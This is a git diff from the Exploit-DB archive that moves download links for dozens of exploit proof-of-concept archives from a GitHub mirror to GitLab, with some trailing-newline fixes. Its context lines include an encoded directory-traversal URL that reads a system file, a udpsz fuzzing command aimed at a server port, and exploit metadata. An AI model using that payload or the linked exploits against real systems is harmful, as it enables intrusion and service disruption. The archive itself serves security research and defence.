b/exploits/linux/remote/7701.txt @@ -36,6 +36,6 @@ struct versions vers[VERSN] = {"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024} }; -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7701.zip (2009-lsa.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7701.zip (2009-lsa.zip) # milw0rm.com [2009-01-08] \ No newline at end of file diff --git a/exploits/linux/webapps/30085.txt b/exploits/linux/webapps/30085.txt index 72df87a21..0ea1868ca 100644 --- a/exploits/linux/webapps/30085.txt +++ b/exploits/linux/webapps/30085.txt @@ -8,7 +8,7 @@ # CVE : No CVE, no patch just 0Day # State : Critical -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30085.zip (zimbraexploit_rubina119.zip) +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30085.zip (zimbraexploit_rubina119.zip) ---------------Description----------------- diff --git a/exploits/linux/webapps/42769.rb b/exploits/linux/webapps/42769.rb index 469144d3d..cf5f318da 100755 --- a/exploits/linux/webapps/42769.rb +++ b/exploits/linux/webapps/42769.rb @@ -100,4 +100,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end -end +end \ No newline at end of file diff --git a/exploits/linux/webapps/42975.txt b/exploits/linux/webapps/42975.txt index 808d489a6..46ba1ccd1 100644 --- a/exploits/linux/webapps/42975.txt +++ b/exploits/linux/webapps/42975.txt @@ -19,4 +19,4 @@ https://ip:8443/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE https://ip/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFhome%C0%AFdgate%C0%AFiptables -Then the file will be visible +Then the file will be visible \ No newline at end of file diff --git a/exploits/linux/webapps/42991.txt b/exploits/linux/webapps/42991.txt index 2d00611ce..120dbd406 100644 --- a/exploits/linux/webapps/42991.txt +++ b/exploits/linux/webapps/42991.txt @@ -98,4 +98,4 @@ MESSAGE=x-chat/control Fix: ==== -Vendor has confirmed the vulnerability, will be fixed in the next release. +Vendor has confirmed the vulnerability, will be fixed in the next release. \ No newline at end of file diff --git a/exploits/linux/webapps/48642.sh b/exploits/linux/webapps/48642.sh index 204607064..0b6ab6732 100755 --- a/exploits/linux/webapps/48642.sh +++ b/exploits/linux/webapps/48642.sh @@ -1,6 +1,6 @@ #!/bin/bash # -# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip +# EDB Note Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48642.zip # # Exploit Title: F5 BIG-IP Remote Code Execution # Date: 2020-07-06 diff --git a/exploits/linux_x86-64/dos/33585.txt b/exploits/linux_x86-64/dos/33585.txt index e2173d9a1..62f0c0d11 100644 --- a/exploits/linux_x86-64/dos/33585.txt +++ b/exploits/linux_x86-64/dos/33585.txt @@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable. NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33585.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33585.tgz \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37868.txt b/exploits/linux_x86-64/dos/37868.txt index 586312e2f..8a7ba6a32 100644 --- a/exploits/linux_x86-64/dos/37868.txt +++ b/exploits/linux_x86-64/dos/37868.txt @@ -10,4 +10,4 @@ At first glance this might appear to be a NULL dereference but sometimes it cras The base sample from which the fuzz case is derived is also attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37868.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37868.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37876.txt b/exploits/linux_x86-64/dos/37876.txt index ca96fa5fe..e620856bc 100644 --- a/exploits/linux_x86-64/dos/37876.txt +++ b/exploits/linux_x86-64/dos/37876.txt @@ -36,4 +36,4 @@ function func(){ A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37876.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37876.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37879.txt b/exploits/linux_x86-64/dos/37879.txt index feb1c8cf6..a190fb1ae 100644 --- a/exploits/linux_x86-64/dos/37879.txt +++ b/exploits/linux_x86-64/dos/37879.txt @@ -20,4 +20,4 @@ This looks very like a heap-based buffer overflow that just happens to have walk Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37879.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37879.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/dos/37880.txt b/exploits/linux_x86-64/dos/37880.txt index 6e8f7cde1..e400e4dc8 100644 --- a/exploits/linux_x86-64/dos/37880.txt +++ b/exploits/linux_x86-64/dos/37880.txt @@ -20,4 +20,4 @@ rdx 0x160b It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37880.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37880.zip \ No newline at end of file diff --git a/exploits/linux_x86-64/local/35472.txt b/exploits/linux_x86-64/local/35472.txt index f5c6b1e15..8f0ffef49 100644 --- a/exploits/linux_x86-64/local/35472.txt +++ b/exploits/linux_x86-64/local/35472.txt @@ -43,7 +43,7 @@ by knowing only an address belonging to the application and the offset2lib value +------------------+ The proof of concept exploit code is available here: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35472.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35472.tgz http://packetstormsecurity.com/files/129398 +------------------------------------------------------------------------------+ diff --git a/exploits/linux_x86-64/local/36310.txt b/exploits/linux_x86-64/local/36310.txt index 46279c53a..4891ef345 100644 --- a/exploits/linux_x86-64/local/36310.txt +++ b/exploits/linux_x86-64/local/36310.txt @@ -2,7 +2,7 @@ Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=283 -Full PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36310.tar.gz +Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36310.tar.gz This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM "rowhammer" diff --git a/exploits/linux_x86-64/local/36311.txt b/exploits/linux_x86-64/local/36311.txt index 245f36e61..180ab19c4 100644 --- a/exploits/linux_x86-64/local/36311.txt +++ b/exploits/linux_x86-64/local/36311.txt @@ -2,7 +2,7 @@ Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=284 -Full PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36311.tar.gz +Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36311.tar.gz This is a proof-of-concept exploit that is able to escape from Native diff --git a/exploits/linux_x86-64/local/40049.c b/exploits/linux_x86-64/local/40049.c index d622e9dff..6f14d4e6d 100644 --- a/exploits/linux_x86-64/local/40049.c +++ b/exploits/linux_x86-64/local/40049.c @@ -1,5 +1,5 @@ /* -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40053.zip +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip */ --------------------------------------------------- decr.c --------------------------------------------------- diff --git a/exploits/linux_x86-64/local/44300.c b/exploits/linux_x86-64/local/44300.c index 1cd132f5b..86c6dff03 100644 --- a/exploits/linux_x86-64/local/44300.c +++ b/exploits/linux_x86-64/local/44300.c @@ -1,5 +1,5 @@ /** - EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44300.zip + EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip Video ~ https://www.youtube.com/watch?v=qchiJn94kTo **/ diff --git a/exploits/linux_x86-64/remote/32277.txt b/exploits/linux_x86-64/remote/32277.txt index 1bc50e0db..0639977e0 100644 --- a/exploits/linux_x86-64/remote/32277.txt +++ b/exploits/linux_x86-64/remote/32277.txt @@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32277.tgz \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32277.tgz \ No newline at end of file diff --git a/exploits/linux_x86/dos/38763.txt b/exploits/linux_x86/dos/38763.txt index 133616835..4b9bcb48e 100644 --- a/exploits/linux_x86/dos/38763.txt +++ b/exploits/linux_x86/dos/38763.txt @@ -127,4 +127,4 @@ gs 0x63 99 #10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38763.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38763.zip \ No newline at end of file diff --git a/exploits/linux_x86/remote/20032.txt b/exploits/linux_x86/remote/20032.txt index cd83bc3da..1c72d1ce4 100644 --- a/exploits/linux_x86/remote/20032.txt +++ b/exploits/linux_x86/remote/20032.txt @@ -4,4 +4,4 @@ Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shi It should be noted that the SITE INDEX command is affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20032.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20032.tar.gz \ No newline at end of file diff --git a/exploits/macos/dos/40954.c b/exploits/macos/dos/40954.c index 5955d74ad..e5e759a04 100644 --- a/exploits/macos/dos/40954.c +++ b/exploits/macos/dos/40954.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954 Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40954.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40954.zip Userspace MIG services often use mach_msg_server or mach_msg_server_once to implent an RPC server. diff --git a/exploits/macos/dos/42046.txt b/exploits/macos/dos/42046.txt index 79cb99932..2cb57e231 100644 --- a/exploits/macos/dos/42046.txt +++ b/exploits/macos/dos/42046.txt @@ -54,4 +54,4 @@ This bug was verified using the following kernel version: root:xnu-3248.60.11.2.1~1/RELEASE_X86_64 x86_64 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42046.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42046.zip \ No newline at end of file diff --git a/exploits/macos/dos/42047.txt b/exploits/macos/dos/42047.txt index 04a3564aa..c152b54e7 100644 --- a/exploits/macos/dos/42047.txt +++ b/exploits/macos/dos/42047.txt @@ -25,4 +25,4 @@ addresses on the right are valid kernel stack pointers. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42047.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42047.zip \ No newline at end of file diff --git a/exploits/macos/dos/43415.txt b/exploits/macos/dos/43415.txt index 8fb43cef1..d6dd0aec8 100644 --- a/exploits/macos/dos/43415.txt +++ b/exploits/macos/dos/43415.txt @@ -37,4 +37,4 @@ make clean Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43415.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43415.zip \ No newline at end of file diff --git a/exploits/macos/dos/44235.c b/exploits/macos/dos/44235.c index 5ea9d4c4f..1f058a98c 100644 --- a/exploits/macos/dos/44235.c +++ b/exploits/macos/dos/44235.c @@ -4,7 +4,7 @@ * * Buffer overflow reachable from IOFireWireUserClient::localConfigDirectory_Publish. * - * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44235.zip + * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44235.zip */ #include <IOKit/IOKitLib.h> diff --git a/exploits/macos/dos/44236.c b/exploits/macos/dos/44236.c index 1b419053d..5af616c13 100644 --- a/exploits/macos/dos/44236.c +++ b/exploits/macos/dos/44236.c @@ -4,7 +4,7 @@ * * NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop. * - * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44236.zip + * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip */ diff --git a/exploits/macos/dos/44561.txt b/exploits/macos/dos/44561.txt index 32448e5c9..449db9986 100644 --- a/exploits/macos/dos/44561.txt +++ b/exploits/macos/dos/44561.txt @@ -55,4 +55,4 @@ tested on MacOS 10.13.2 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44561.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44561.zip \ No newline at end of file diff --git a/exploits/macos/dos/45787.txt b/exploits/macos/dos/45787.txt index 3dccf0170..c1b9cb4e4 100644 --- a/exploits/macos/dos/45787.txt +++ b/exploits/macos/dos/45787.txt @@ -24,4 +24,4 @@ When I reproduced this, my host was a Mac mini running version 10.13.6. My targe Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45787.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45787.zip \ No newline at end of file diff --git a/exploits/macos/dos/45788.txt b/exploits/macos/dos/45788.txt index b4c7bedfa..4d9f6d2da 100644 --- a/exploits/macos/dos/45788.txt +++ b/exploits/macos/dos/45788.txt @@ -50,4 +50,4 @@ I've improved the PoC a lot for this, an updated video-replay.c is attached. Th Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45788.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45788.zip \ No newline at end of file diff --git a/exploits/macos/dos/46433.txt b/exploits/macos/dos/46433.txt index 327bac8a7..96c106d12 100644 --- a/exploits/macos/dos/46433.txt +++ b/exploits/macos/dos/46433.txt @@ -126,4 +126,4 @@ Taking a second look at this, the root cause of this issue is probably an overfl Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46433.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46433.zip \ No newline at end of file diff --git a/exploits/macos/dos/46478.txt b/exploits/macos/dos/46478.txt index 17d3d5aa9..24451a3d3 100644 --- a/exploits/macos/dos/46478.txt +++ b/exploits/macos/dos/46478.txt @@ -177,4 +177,4 @@ $ ./mOOM_COW Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46478.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46478.zip \ No newline at end of file diff --git a/exploits/macos/dos/47207.txt b/exploits/macos/dos/47207.txt index 70438dff3..9ad86a837 100644 --- a/exploits/macos/dos/47207.txt +++ b/exploits/macos/dos/47207.txt @@ -15,4 +15,4 @@ CarbonCore contains a large number of calls to unsafe string handling functions. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47207.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47207.zip \ No newline at end of file diff --git a/exploits/macos/dos/47479.txt b/exploits/macos/dos/47479.txt index fc5f85ff2..12582e79f 100644 --- a/exploits/macos/dos/47479.txt +++ b/exploits/macos/dos/47479.txt @@ -261,4 +261,4 @@ In case you decide to fix the bug in a different way, please note: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47479.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47479.zip \ No newline at end of file diff --git a/exploits/macos/dos/47791.txt b/exploits/macos/dos/47791.txt index 09404a563..dd6cdac5e 100644 --- a/exploits/macos/dos/47791.txt +++ b/exploits/macos/dos/47791.txt @@ -36,4 +36,4 @@ Tested on macOS 10.14.6 (18G87). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47791.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47791.zip \ No newline at end of file diff --git a/exploits/macos/local/40669.txt b/exploits/macos/local/40669.txt index 475bd6ae1..649cadd6f 100644 --- a/exploits/macos/local/40669.txt +++ b/exploits/macos/local/40669.txt @@ -246,4 +246,4 @@ Project Zero remains committed to a 90-day disclosure window, and will continue Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40669.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40669.zip \ No newline at end of file diff --git a/exploits/macos/local/40956.c b/exploits/macos/local/40956.c index 5bfa297f4..1dae8d969 100644 --- a/exploits/macos/local/40956.c +++ b/exploits/macos/local/40956.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=941 Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40956.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40956.zip The previous ref count overflow bugs were all kinda slow because they were quite deep in kernel code, a lot of mach message and MIG code had to run for each leak. diff --git a/exploits/macos/local/40957.c b/exploits/macos/local/40957.c index ae55553cf..fc440991a 100644 --- a/exploits/macos/local/40957.c +++ b/exploits/macos/local/40957.c @@ -2,7 +2,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=959 Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40957.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40957.zip When sending and receiving mach messages from userspace there are two important kernel objects; ipc_entry and ipc_object. diff --git a/exploits/macos/local/44234.c b/exploits/macos/local/44234.c index adf4468d1..47ea00250 100644 --- a/exploits/macos/local/44234.c +++ b/exploits/macos/local/44234.c @@ -45,7 +45,7 @@ * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS * High Sierra 10.13 (build 17A365). * - * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44234.zip + * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44234.zip * */ #if 0 diff --git a/exploits/macos/local/44237.md b/exploits/macos/local/44237.md index 228e42dc9..4da7fa589 100644 --- a/exploits/macos/local/44237.md +++ b/exploits/macos/local/44237.md @@ -62,4 +62,4 @@ The physmem code is released into the public domain. As a courtesy I ask that if use any of this code you attribute it to me. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44237.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44237.zip \ No newline at end of file diff --git a/exploits/macos/local/46428.m b/exploits/macos/local/46428.m index 4c193d278..58379cf3a 100644 --- a/exploits/macos/local/46428.m +++ b/exploits/macos/local/46428.m @@ -929,4 +929,4 @@ static void timed_log(char* format, ...) } -# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46428.zip +# Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46428.zip \ No newline at end of file diff --git a/exploits/macos/local/47400.md b/exploits/macos/local/47400.md index cdd4d4219..5bcfb9a21 100644 --- a/exploits/macos/local/47400.md +++ b/exploits/macos/local/47400.md @@ -51,4 +51,4 @@ Tested on macOS Mojave: `Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18 - - - -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47400.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47400.zip \ No newline at end of file diff --git a/exploits/macos/local/47708.txt b/exploits/macos/local/47708.txt index b196a2852..87ca65765 100644 --- a/exploits/macos/local/47708.txt +++ b/exploits/macos/local/47708.txt @@ -261,4 +261,4 @@ Miscellaneous notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47708.zip \ No newline at end of file diff --git a/exploits/macos/remote/42125.txt b/exploits/macos/remote/42125.txt index bcf25f795..e25bc8e3a 100644 --- a/exploits/macos/remote/42125.txt +++ b/exploits/macos/remote/42125.txt @@ -18,4 +18,4 @@ In our exploit we perform step 5 in a separate web worker, so that we can launch Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42125.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42125.zip \ No newline at end of file diff --git a/exploits/multiple/dos/10205.txt b/exploits/multiple/dos/10205.txt index 795f9d1d2..556f7bbe0 100644 --- a/exploits/multiple/dos/10205.txt +++ b/exploits/multiple/dos/10205.txt @@ -168,4 +168,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10205.zip (2009-11-22-35451.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10205.zip (2009-11-22-35451.zip) \ No newline at end of file diff --git a/exploits/multiple/dos/10327.txt b/exploits/multiple/dos/10327.txt index a944ead9a..b7ed521b8 100644 --- a/exploits/multiple/dos/10327.txt +++ b/exploits/multiple/dos/10327.txt @@ -146,4 +146,4 @@ Avaya Intuity AUDIX LX 2.0 Avaya Intuity AUDIX LX 1.0 Avaya Intuity AUDIX -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10327.pdf (2009-12-05-34337.pdf) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10327.pdf (2009-12-05-34337.pdf) \ No newline at end of file diff --git a/exploits/multiple/dos/11142.txt b/exploits/multiple/dos/11142.txt index dbf115184..98c8f0923 100644 --- a/exploits/multiple/dos/11142.txt +++ b/exploits/multiple/dos/11142.txt @@ -45,4 +45,4 @@ Not Vulnerable: Firefox 3.5.3 on Windows crashed once but not reliably. PoC Packagetx: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip) \ No newline at end of file diff --git a/exploits/multiple/dos/14268.txt b/exploits/multiple/dos/14268.txt index 0a1df962b..621520918 100644 --- a/exploits/multiple/dos/14268.txt +++ b/exploits/multiple/dos/14268.txt @@ -69,7 +69,7 @@ Multi-Computer Virtual Whiteboard and so on. http://aluigi.org/poc/qtsslame.zip or -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14268.zip (qtsslame.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14268.zip (qtsslame.zip) ####################################################################### diff --git a/exploits/multiple/dos/14761.txt b/exploits/multiple/dos/14761.txt index 011a797e0..55d454f9c 100644 --- a/exploits/multiple/dos/14761.txt +++ b/exploits/multiple/dos/14761.txt @@ -9,7 +9,7 @@ Website : http://www.itsecteam.com Forum : http://forum.ITSecTeam.com --------------------------------------------------------------------------- Advisory URL: http://itsecteam.com/en/papers/paper11.htm -POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14761.zip (adb_poc.zip) +POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14761.zip (adb_poc.zip) --------------------------------------------------------------------------- System Affected: Adobe Acrobat reader 7.x diff --git a/exploits/multiple/dos/15086.py b/exploits/multiple/dos/15086.py index d125b4f36..05b0eddcd 100755 --- a/exploits/multiple/dos/15086.py +++ b/exploits/multiple/dos/15086.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15086.zip (moaub-23-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15086.zip (moaub-23-exploit.zip) ''' ''' diff --git a/exploits/multiple/dos/15215.txt b/exploits/multiple/dos/15215.txt index b0abad187..5e42de4ea 100644 --- a/exploits/multiple/dos/15215.txt +++ b/exploits/multiple/dos/15215.txt @@ -284,7 +284,7 @@ With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc. 0day remote ftpd Denial-of-Service: http://cxib.net/stuff/glob-0day.c -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15215.c (glob-0day.c) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15215.c (glob-0day.c) - --- 3. Fix --- Oracle 25.09.2010 CET: Being fixed in main codeline diff --git a/exploits/multiple/dos/15261.txt b/exploits/multiple/dos/15261.txt index c1a4b8b2b..a7b06231f 100644 --- a/exploits/multiple/dos/15261.txt +++ b/exploits/multiple/dos/15261.txt @@ -64,7 +64,7 @@ The effects of the problem can be: http://aluigi.org/poc/soliddb_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15261.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15261.zip ####################################################################### diff --git a/exploits/multiple/dos/15676.txt b/exploits/multiple/dos/15676.txt index b5a399185..1618fdde4 100644 --- a/exploits/multiple/dos/15676.txt +++ b/exploits/multiple/dos/15676.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow attackers to crash the application and deny serv This issue affects Wireshark 1.2.0 through 1.2.12 and 1.4.0 through 1.4.1. -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15676-pcap.zip \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15676-pcap.zip \ No newline at end of file diff --git a/exploits/multiple/dos/15707.txt b/exploits/multiple/dos/15707.txt index a198e1c3a..f0ce338dc 100644 --- a/exploits/multiple/dos/15707.txt +++ b/exploits/multiple/dos/15707.txt @@ -93,7 +93,7 @@ memory location: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15707.zip (udpsz.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip (udpsz.zip) udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18 diff --git a/exploits/multiple/dos/15973.txt b/exploits/multiple/dos/15973.txt index f9ff5822b..9a447d561 100644 --- a/exploits/multiple/dos/15973.txt +++ b/exploits/multiple/dos/15973.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the application to enter an infinite l Wireshark 1.4.0 to 1.4.1 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15973.pcap (44986.pcap) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15973.pcap (44986.pcap) \ No newline at end of file diff --git a/exploits/multiple/dos/16261.txt b/exploits/multiple/dos/16261.txt index 0402d2a03..de4a9a9c7 100644 --- a/exploits/multiple/dos/16261.txt +++ b/exploits/multiple/dos/16261.txt @@ -147,4 +147,4 @@ n/a -- Luca Carettoni -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/16261.zip \ No newline at end of file +PoC: 